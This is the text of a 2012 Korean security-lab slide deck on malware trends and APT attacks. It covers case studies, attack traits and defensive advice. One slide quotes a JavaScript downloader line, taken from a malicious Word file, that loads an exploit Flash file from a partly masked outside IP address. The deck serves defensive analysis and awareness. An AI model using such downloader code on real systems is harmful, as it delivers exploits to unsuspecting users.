2012 년상반기 악성코드동향과전망 - APT 2012. 10. 10 조시행연구소장
Contents 01 APT 02 최근 APT 공격사례 03 APT 공격형태의특징 04 미래 APT 공격형태 05 APT 공격대응방안
01 APT(Advanced Persistent Threat)
1) 2012 년도악성코드동향리뷰 2012 년 1 분기악성코드유형별피해분포 2012 년 1 분기대표진단명 Top 20 2012 년 1 분기악성코드유형별신 & 변종분포 4
2) Trojan, 국내 vs. 해외 국내 vs. 해외 한국 해외 공격대상 온라인게임계정정보 & 아이템 인터넷뱅킹정보 악성코드 Onlinegamehack Zeus, SpyEye 피해규모 추산불가 [FBI] 최소 7000 만달러에서 2 억 200 만달러의피해발생추정 공통점 1. 악성코드제작툴을통해서끊임없이변종들을제작및유포 2. 악성코드제작툴은블랙마켓에서상용으로판매 3. "Zeus Bot 소스가인터넷에공개 " 5
3) Onlinegamehack 요약 2012 년 4 월침해사이트통계 45 40 35 30 25 20 Site 1 Site 2 Site 3 15 10 5 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 6
4) APT 공격의정의 1989 모리스 (Morris) 웜은 Advanced Threat 이었다. 방화벽 (Firewall) 이나와서방어할수있었다. 2001 코드레드 (Code Red) 와님다 (Nimda) 는 Advanced Threat 이었다. IPS 가나와서막을수있었다. 2000 년대중반 스파이웨어는 Advanced & Persistent Threat 이었다. 안티스파이웨어가나와서막을수있었다. 현재 돈을노리는프로해커의타깃공격은 Advanced & Persistent Threat 이다. 해결책은? 7
5) APT (Advanced Persistent Threat) APT는 2006년무렵미국공군사령부에서사용하였던군사통신용어 미국공군사령부에서는미국국방부와통신시확인된특정보안위협형태를지칭 2010년무렵 APT라는용어가민간부분으로전달되며의미가확장 현재민간부분에서는일반적으로 APT를다음과같이정의 다양한보안위협들을양산하여특정대상에게지속적으로가하는일련의행위 미국공군사령부와미국국방부문장 8
6) APT 공격의정의 Traditional Security Threats 단일악성코드 Advanced Security Threats 모듈화된악성코드추가악성코드업데이트 감염 PC 에대한보안사고 불특정다수 내부주요자원까지접근 Long-term stealth 감염 PC 에의한전이공격 명확한공격목표 9
02 최근 APT 공격사례
1) N 사전산망마비사고 2011 년 4 월 N 사전산망이외부공격으로인한시스템손상으로모든업무마비 외주직원노트북에감염된악성코드를이용해내부시스템침입 공격자는 P2P 프로그램으로악성코드유포이후 7 개월동안감시후공격진행 4 DB 서버의데이터삭제 1 P2P 프로그램 2 악성코드감염 외주직원노트북 악성코드유포 3 원격제어 Attacker 내부시스템 N 사에서발생한침해사고 11
2) S 사침해사고 2011 년 7 월 S 사침해사고로 3500 만명고객개인정보유출 무료소프트웨어업데이트서버해킹후정상파일을악성코드로변경후유포 공격자는 8 일만에 DB 관리자권한획득후 DB 데이터를분할압축후외부유출 1 악성코드유포 무료소프트웨어업데이트서버 2 악성코드감염 3 원격제어 4 DB 서버접속 공격자 6 데이터전송 다른피해서버 5 외부서버로데이터전송 DB 서버 S 사에서발생한침해사고 12
3) 이란원자력발전소스턱스넷 (Stuxnet) 감염 2010 년 7 월이란원자력발전소시스템파괴목적의스턱스넷 (Stuxnet) 발견 MS 윈도우의알려진취약점 3 개와 0-Day 취약점 2 개를악용해유포 2011 년발견된두큐 (Duqu) 와 2012 년발견된플레임 (Flame) 모두이란원자력발전소관련정보수집목적으로유포 스턱스넷악성코드의감염과동작원리 13
4) 오퍼레이션오로라 (Operation Aurora) 침해사고 2011년 1월구글 (Google) 기업기밀정보탈취목적의침해사고발생 해당침해사고는구글 (Google) 외에첨단 IT 기업 34개도공격의대상 공격은 MS 인터넷익스플로러 (Internet Explorer) 의 0-Day 취약점악용 이메일과메신저로악의적인웹사이트로접속하는링크전달 1 공격자 이메일과메신저로웹사이트링크전달 2 기업내부직원링크클릭으로악성코드감염 4 3 원격제어 내부시스템접근 0-Day 취약점악용 C&C 서버 오퍼레이션오로라 (Operation Aurora) 침해사고 내부시스템 14
03 APT 공격형태의특징
1) APT(Advanced Persistent Threat) 공격형태의증가 인터넷과컴퓨터시스템의발달로정부기관및각기업체에서업무자동화도입 모든업무및기밀문서역시전자문서와같은데이터형태로파일서버에보관 정치적, 경제적으로고부가가치의기밀데이터탈취또는파괴를목표 공격목적의다양화로 APT 형태의타깃공격 (Targeted Attack) 이과거에비해증가 시만텍 (Symantec) 에서공개한타깃공격 (Targeted Attack) 증가치 16
2) APT(Advanced Persistent Threat) 공격대상의확장 과거 APT 공격의주된목표는정부및군사기밀정보탈취임으로정부및군사기관이주된 APT 공격의대상 현재는정치적, 경제적으로고부가가치의데이터를보유한일반기업및조직들역시 APT 공격의주요대상 정부기관사회기간산업시설정보통신기업제조업종기업금융업종기업 정부기관기밀문서탈취 군사기밀문서탈취 사이버테러리즘활동 사회기간산업시스템동작불능 첨단기술자산탈취 원천기술관련기밀탈취 기업지적자산탈취 기업영업비밀탈취 사회금융시스템의동작불능 기업금융자산정보탈취 17
3) 고도화된사회공학기법 (Social Engineering) 개발과적용 웹과소셜네트워크 (Social Network) 의발달은공격대상의개인정보수집용이 수집한개인정보들로공격대상에게최적화된사회공학기법 (Social Engineering) 개발및적용 EMC/RSA 침해사고의경우내부직원들에게채용정보관련메일로위장 청첩장과입사지원서로위장한취약한전자문서파일들 18
4) 악성코드및취약점관련기술의발전 악성코드제작및취약점개발기술들의발전은보안제품탐지우회와 APT 공격의성공률을높이는데기여 악성코드는셀프업데이트 (Self-Update), 보안제품무력화기능및다수의개별기능을가진파일들의조합 취약점은다양한일반소프트웨어의알려진취약점또는 0-Day 취약점들을악용 DarkComet RAT 의보안기능무력화옵션 MS10-087 워드취약점악성코드생성기 19
5) APT(Advanced Persistent Threat) 공격기법의다변화 현재까지 APT 공격의주요공격기법은이메일의첨부파일을이용하는형태 과거첨부파일이실행가능한파일이었으나최근에는전자문서형태로변경 한국의경우무료소프트웨어의자동업데이트기능과한국산 P2P 프로그램악용 EMC/RSA 침해사고에사용된이메일 20
04 미래 APT 공격형태
1) 국지적인일반소프트웨어의취약점악용 APT 공격은공격대상이속한국가에서사용빈도가높은소프트웨어취약점악용 한국의한글소프트웨어, 곰플레이어와일본의이치타로 (Ichitaro) 취약점악용 사회공학기법 (Social Engineering) 역시해당국가의문화나사회적이슈를악용 Source : Symantec 한글소프트웨어의 0-Day 취약점악용 이치타로 (Ichitaro) 의 0-Day 취약점악용 22
2) 모바일 (Mobile) 악성코드를이용한공격 모바일기기의휴대성으로인해기업내부반, 출입이용이함 2012 년 2 월안드로이드앱 (Android App) 내부에윈도우스크립트 (Script) 악성코드포함사례발견 2012 년 3 월스마트폰으로수신된 SMS 의피싱 (Phishing) 웹사이트 URL 안드로이드앱 (Android App) 내부의윈도우스크립트 (Script) 악성코드 SMS 로전달된 URL 23
3) 보안제품의탐지우회기법개발과적용 APT 공격에대응하기위한보안제품들의탐지우회를위한악성코드제작 2012 년 5 월어도비플래시 (Adobe Flash) CVE-2012-0779 취약점악용한워드 (Word) 파일은취약점코드없이단순다운로더 (Downloader) 역할만수행 2012 년 6 월스팸메일 (SpamMail) 은웹익스플로잇툴킷 (Web Exploit Toolkit) 과결합으로공격의다변화 javascript:eval(document.write(unescape('%3 Cembed%20src%3Dhttp://178.XX.XX.208/read me.swf?info=789c3334b7d03337d73333d3333 2b0b032313106001f0e0374&infosize=0042000 0%3E%3C/embed%3E'))) 워드파일내부의취약한플래쉬파일다운로드코드 스팸메일과웹익스플로잇툴킷의결합 24
05 APT 공격대응방안
1) 예방 윈도우보안패치 1. 보안패치빠짐없이설치!!! 26
2) 예방 응용프로그램패치 2. 응용프로그램패치설치!!! 27
3) 예방 보안정보모니터링 3. 보안관련정보모니터링!!! 28
4) APT 공격대응방안 보안위협의급속한발전에대응하기위해기업에적합한보안정책수립필요 단일보안장비와소프트웨어에의존보다는다각적 Defense in Depth 전략필요 새로운보안위협에신속한대비와대응을위해서는 Security Intelligence 필요 보안위협의시작점이내부직원임으로주기적인보안인식교육제공필요 APT 공격에대응하기위한보안전략 29
5) APT 공격대응방안 - 기술 사내모든파일의움직임에대한 가시성 확보와 실시간행위분석 - 네트워크관제와내부관제가통합된 Convergence 관제요구 - 클라우드기반의보안기술연구 30
thank you. 2012 년상반기악성코드동향과전망 - APT